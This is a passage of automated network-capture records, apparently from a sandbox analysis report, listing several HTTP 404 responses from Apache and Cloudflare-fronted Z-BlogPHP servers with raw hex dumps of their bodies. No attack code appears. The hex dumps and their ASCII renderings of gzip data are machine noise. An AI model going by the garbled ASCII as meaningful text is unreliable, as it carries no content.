6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:56:52 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:56:55 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:56:57 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:57:00 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:58:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92Wdj3XRE%2FjkwsrG8whjbWBvclKY%2F6cMHWO4wsK7IOi5sFSz8YR6U%2B%2Bri1oOVawtrw8eQTWIwmxvDt8HgrsPp%2BiN6bYGPBq8OPU4ipWy9bl4WlKZBAUcVsKTZzsXRjNRyAk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1a92f79a2d43d4-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 6b 53 db c6 f6 33 99 c9 7f d8 ea 76 6a 98 c1 12 06 d2 07 b5 dd 69 3b 9d de 77 73 db f4 ce 9d 9b 9b 32 6b 69 6d 6f 22 69 15 69 6d 42 33 9d 31 0d 10 1c c2 a3 79 50 1e a6 84 24 94 34 29 86 24 90 12 9e 3f 26 5e 49 fe c4 5f b8 b3 92 6d 6c 08 26 a1 49 27 8c b1 bc bb e7 bd e7 b1 7b 14 7e 4b 21 32 ed 36 10 48 52 4d 8d 1e 3f 16 ae 3c 11 54 f8 53 43 14 02 39 09 4d 0b d1 88 90 a2 f1 e0 fb 42 65 5e 87 1a 8a 08 26 d2 15 64 22 53 00 32 d1 29 d2 69 44 e8 42 b1 73 98 ee 02 26 29 35 82 e8 7c 0a a7 23 c2 7f 82 5f 7f 1c fc 94 68 06 a4 38 a6 a2 2a ac bf 7c 16 41 4a 02 35 cb 49 93 68 28 12 da cb 08 1a 86 8a 65 18 53 51 50 41 69 2c 23 a1 82 6a c8 cd 1a 89 61 15 ed c5 49 63 d4 65 10 93 56 0b 87 15 9a 8c f8 14 82 de a0 59 c3 3a d6 52 5a d0 92 a1 8a 22 a1 66 ac 63 8a a1 5a 1e 7b 44 29 a6 2a 8a b6 b7 b4 bf 05 d8 e2 d3 c2 ea 90 bb f2 db ce c6 d5 e2 ec 4a 71 fa b6 9d bb 6f 67 b7 d8 c0 12 08 02 67 78 d0 cd f4 b9 43 77 dc 4c c6 be b1 ee dc 9c 2b 3c 1d 64 f9 27 61 c9 27 71 fc 58 58 c5 fa 39 90 34 51 3c 22 70 d3 74 48 52 57 57 97 28 27 b1 0e 91 2e 12 33 21 7d 1b eb 4c 59 c8 b4 24 9a 44 1a 92 ba 95 50 a8 f5 44 dc 44 48 b2 68 b7 8a 24 d9 b2 a4 38 d1 69 10 76 21 8b 68 48 d4 b0 2e ca 96 25 00 13 a9 11 c1 03 b2 92 08 f9 9b f0 6a f8 59 5d d8 40 66 b0 5d 6c 13 db 5e 80 df de 05 c0 1d 2d 22 50 74 81 4a 1e e6 ef 16 48 27 a6 06 55 fc 2d f2 25 91 fe 20 d6 de 77 d9 00 1f a5 23 21 b1 55 6c 2f b1 b7 64 13 1b 14 58 a6 5c 8f bc d5 6d 51 a4 49 3e b0 74 f6 7c 0a 99 dd c1 56 4e c6 23 7b d6 aa 91 f8 2c 4c 43 1f 54 88 86 4b 48 47 e5 f5 6d 4c 25 09 23 69 bc 4e 1e 72 27 cf 22 9d 67 ad 4e a8 28 a2 91 34 5e 88 93 Data Ascii: a50kS3vji;ws2kimo"iimB31yP$4)$?&^I_ml&I'{~K!26HRM?<TSC9MBe^&d"S2)iDBs&)5|#_h8*|AJ5Ih(eSQPAi,#jaIceVY:RZ"fcZ{D)*JqoggxCwL+<d'a'qXX94Q<"ptHRWW('.3!}LY$DPDDHh$8iv!hH.%jY]@f]l^-"PtJH'U-% w#!Ul/dX\mQI>t|VN#{,LCTKHGmL%#iNr'"gN(4^
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:58:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXiRVfftg3JAv89xk2bLNujjfrQWM6Fe4os0VnvQBLCJl2T5c9acTASNmX%2Bu%2BbuRPN3SsHg52SFUreAEXYpUhmg9F%2FDIYZzJgWMCzBQMrt0PhwYtybKBx8mSqeBBY9VXTyI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1a93078f7043fd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 35 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 6b 53 db c6 f6 33 99 c9 7f d8 ea 76 6a 98 c1 12 06 d2 07 b5 dd 69 3b 9d de 77 73 db f4 ce 9d 9b 9b 32 6b 69 6d 6f 22 69 15 69 6d 42 33 9d 31 0d 10 1c c2 a3 79 50 1e a6 84 24 94 34 29 86 24 90 12 9e 3f 26 5e 49 fe c4 5f b8 b3 92 6d 6c 08 26 a1 49 27 8c b1 bc bb e7 bd e7 b1 7b 14 7e 4b 21 32 ed 36 10 48 52 4d 8d 1e 3f 16 ae 3c 11 54 f8 53 43 14 02 39 09 4d 0b d1 88 90 a2 f1 e0 fb 42 65 5e 87 1a 8a 08 26 d2 15 64 22 53 00 32 d1 29 d2 69 44 e8 42 b1 73 98 ee 02 26 29 35 82 e8 7c 0a a7 23 c2 7f 82 5f 7f 1c fc 94 68 06 a4 38 a6 a2 2a ac bf 7c 16 41 4a 02 35 cb 49 93 68 28 12 da cb 08 1a 86 8a 65 18 53 51 50 41 69 2c 23 a1 82 6a c8 cd 1a 89 61 15 ed c5 49 63 d4 65 10 93 56 0b 87 15 9a 8c f8 14 82 de a0 59 c3 3a d6 52 5a d0 92 a1 8a 22 a1 66 ac 63 8a a1 5a 1e 7b 44 29 a6 2a 8a b6 b7 b4 bf 05 d8 e2 d3 c2 ea 90 bb f2 db ce c6 d5 e2 ec 4a 71 fa b6 9d bb 6f 67 b7 d8 c0 12 08 02 67 78 d0 cd f4 b9 43 77 dc 4c c6 be b1 ee dc 9c 2b 3c 1d 64 f9 27 61 c9 27 71 fc 58 58 c5 fa 39 90 34 51 3c 22 70 d3 74 48 52 57 57 97 28 27 b1 0e 91 2e 12 33 21 7d 1b eb 4c 59 c8 b4 24 9a 44 1a 92 ba 95 50 a8 f5 44 dc 44 48 b2 68 b7 8a 24 d9 b2 a4 38 d1 69 10 76 21 8b 68 48 d4 b0 2e ca 96 25 00 13 a9 11 c1 03 b2 92 08 f9 9b f0 6a f8 59 5d d8 40 66 b0 5d 6c 13 db 5e 80 df de 05 c0 1d 2d 22 50 74 81 4a 1e e6 ef 16 48 27 a6 06 55 fc 2d f2 25 91 fe 20 d6 de 77 d9 00 1f a5 23 21 b1 55 6c 2f b1 b7 64 13 1b 14 58 a6 5c 8f bc d5 6d 51 a4 49 3e b0 74 f6 7c 0a 99 dd c1 56 4e c6 23 7b d6 aa 91 f8 2c 4c 43 1f 54 88 86 4b 48 47 e5 f5 6d 4c 25 09 23 69 bc 4e 1e 72 27 cf 22 9d 67 ad 4e a8 28 a2 91 34 5e 88 93 e4 a5 9c 70 Data Ascii: a5ckS3vji;ws2kimo"iimB31yP$4)$?&^I_ml&I'{~K!26HRM?<TSC9MBe^&d"S2)iDBs&)5|#_h8*|AJ5Ih(eSQPAi,#jaIceVY:RZ"fcZ{D)*JqoggxCwL+<d'a'qXX94Q<"ptHRWW('.3!}LY$DPDDHh$8iv!hH.%jY]@f]l^-"PtJH'U-% w#!Ul/dX\mQI>t|VN#{,LCTKHGmL%#iNr'"gN(4^p
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:58:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqKl6BrJbH3ukjPgXID845WlmgfA8QHky%2BniyN6OVDriwlMOBAATDG08YYh4h7DiVlFWlr%2FQ1UNt9HSxEXoH3Cnz7eyA8k1UkmMR2yfc7pAF1mHGQvs7PO2ZDRBgVmfBtAM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1a93174b44c41d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 6b 53 db c6 f6 33 99 c9 7f d8 ea 76 6a 98 c1 12 06 d2 07 b5 dd 69 3b 9d de 77 73 db f4 ce 9d 9b 9b 32 6b 69 6d 6f 22 69 15 69 6d 42 33 9d 31 